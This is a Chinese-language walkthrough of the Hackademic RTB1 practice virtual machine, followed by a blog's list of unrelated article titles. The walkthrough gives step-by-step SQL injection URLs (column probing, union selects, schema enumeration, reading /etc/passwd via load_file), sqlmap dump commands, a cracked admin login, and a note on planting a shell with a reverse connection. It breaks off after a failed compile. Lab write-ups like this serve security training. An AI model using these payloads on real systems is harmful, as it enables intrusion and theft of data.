RTB1靶机
一、信息收集
信息收集
http://192.168.111.132/Hackademic_RTB1/?cat=1
http://192.168.111.132/Hackademic_RTB1/?cat=1%27
http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%201
http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%206
http://192.168.111.132/Hackademic_RTB1/?cat=1%20union%20select%201,2,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=1%20union%20select%201,2,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,2,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,@@version,3,4,5
http://192.168.111.132/Hackademic_RTB1/?cat=1
and 1=2 union select 1,group_concat(schema_name),3,4,5 from
information_schema.schemata
http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,load_file(‘/etc/passwd’),3,4,5 from mysql.user
或者sqlmap
sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs
sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs --batch --dump
使用md5进行解密
账户登录GeorgeMiller权限最高
GeorgeMiller q1w2e3
进入后台页面
蚁剑连接并且反弹到kali
上传文件
编译失败
继续寻找
最新文章
- rails程序文件名命名规范
- Sphinx学习之sphinx的安装篇
- Python学习(8)字符串
- opencv 金字塔图像分割
- SQL JOB
- hadoop拾遗(一)---- 避免切分map文件
- CSS 3 属性学习大纲
- Oracle中的二进制、八进制、十进制、十六进制相互转换函数
- 201521123092《java程序设计》第四周学习总结
- 转 c#性能优化秘密
- python基础第一天 3.27
- 8 Oracle语句
- 分治法——快速排序(quicksort)
- [UE4]Button
- [UFLDL] Generative Model
- vue-cli3快速创建项目
- YQCB冲刺第二周第三天
- OpenGL OBJ模型加载.
- Super Star(最小球覆盖)
- C#通过rdp账密直接打开远程桌面
热门文章
- 如何使用 jest 和 lint-staged 只检测发生改动的文件
- Docker与k8s的恩怨情仇(二)—用最简单的技术实现“容器”
- 聊聊 Feign 的实现原理
- 机械革命z2安装ubuntu20
- Vue(12)组件的组织结构和组件注册
- vue中$nextTick详细讲解保证你一看就明白
- 27、Tomcat服务的安装与配置
- 【luogu P3807】【模板】卢卡斯定理/Lucas 定理(含 Lucas 定理证明)
- k8s结合jumpserver做kubectl权限控制 用户在多个namespaces的访问权限 rbac权限控制
- Flask(7)- request 对象